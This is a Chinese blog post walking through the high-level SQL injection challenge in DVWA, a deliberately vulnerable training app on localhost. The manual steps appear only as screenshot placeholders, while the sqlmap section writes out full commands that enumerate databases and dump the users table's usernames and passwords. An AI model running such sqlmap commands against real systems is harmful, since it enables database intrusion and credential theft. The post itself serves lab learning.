[网络安全]DVWA之SQL注入—High level解题详析

发布时间 2023-05-02 22:11:14作者: 秋说

免责声明:本文仅分享SQL攻击相关知识,不承担任何法律责任。
DVWA请读者自行安装,本文不再赘述。
由于high level仅涉及简单攻击知识,本文不再详细解释。建议读者在理解SQL注入原理,熟悉low level、medium level解题姿势后再观看本文。
具体原理及姿势参见:
[网络安全]DVWA之SQL注入—low level解题详析

[网络安全]DVWA之SQL注入—medium level解题详析

[网络安全]以留言板项目渗透实例带你入门sqlmap

手工注入

判断注入类型

在这里插入图片描述在这里插入图片描述由以上两个回显可知,该注入类型为字符型注入。

判断注入点个数

在这里插入图片描述在这里插入图片描述由以上两个回显可知,注入点个数为两个。

爆库名

在这里插入图片描述

爆表名

在这里插入图片描述

爆列名

在这里插入图片描述

爆字段

在这里插入图片描述

sqlmap注入

查看是否存在注入点

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1"
在这里插入图片描述
在这里插入图片描述存在注入点。

爆库名

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" --dbs
在这里插入图片描述
在这里插入图片描述

爆表名

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa --tables
在这里插入图片描述
在这里插入图片描述

爆列名

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa -t users --columns
在这里插入图片描述
在这里插入图片描述-D、-T为大写或小写均可

爆字段

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa -T users -C user,password --dump
在这里插入图片描述
在这里插入图片描述

总结

以上为DVWA之SQL注入—high level解题简析,使用手工注入及sqlmap分享SQL攻击知识。
后续会分享DVWA之SQL注入—Impossible level代码审计。
我是秋说,我们下次见。